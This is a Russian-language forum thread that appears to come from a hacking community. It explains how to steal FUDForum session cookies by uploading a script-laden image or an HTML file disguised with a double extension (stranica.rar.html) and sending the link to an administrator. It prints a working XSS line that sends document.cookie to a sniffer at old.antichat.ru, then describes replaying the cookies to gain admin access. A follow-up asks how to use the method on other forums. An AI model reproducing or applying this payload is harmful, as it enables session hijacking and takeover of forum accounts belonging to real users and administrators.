Уязвимость FUDForum, Ворование куков FUDForum
 

Вобщем делается так:
Берём картинку, с названием 1.jpg
Открываем блокнотом. И вставляем в картинку допустим

После вставки в сообщение будет ссылка наподобии этой:
http://forum.site.ru/index.php?t=get...2723&private=0
или так нагляднее:
http://forum.site.ru/index.php?t=getfile&id=2723
После открытия этой ссылки произойдёт кража куков пользователей
На проверку кода PHP ещё не проверял, но возможно.
******
Далее идем сюда:
http://old.antichat.ru/sniff/log.php
И вставляем куки себе. И ты админ.

Можно поприкалываться и так:

я чуть-чуть делаю на форуме по другому
сначала нахожу в инете какуюто интересную хтмл
сохраняю ее
потом вписываю в нее код
-------------------------------------------------------------------------------------
<html>
<head>
<script>img = new Image(); img.src = "http://old.antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
</head>
</html>
-------------------------------------------------------------------------------------------
сохраняю и переминовываю в тип stranica.rar(или другой формат который поддерживает форум для заливки).html
потом заливаю это на форум в любую тему
также эту ссылку кидаю админу
потом только стоит подменить куки и вы юзер , модер , админ
и делайте че хотите
способ заливки stranica.rar.html выходит на многих форумах в которых проблеми с фильтрацией
П.С. также можна таким методом залить страницу в аватары , и поставить на аватар, только потом код будет чуть-чуть другой

HiMiC, вообщем пробывал в картинку вставить этот код, но она почему то не открывается. Подскажи, что то может не правильно делаю? И еще вопрос, как на других форумах это проделывать ?

никому такого не пожелаю, просто ужас

__http://security.nnov.ru/Jdocument612.html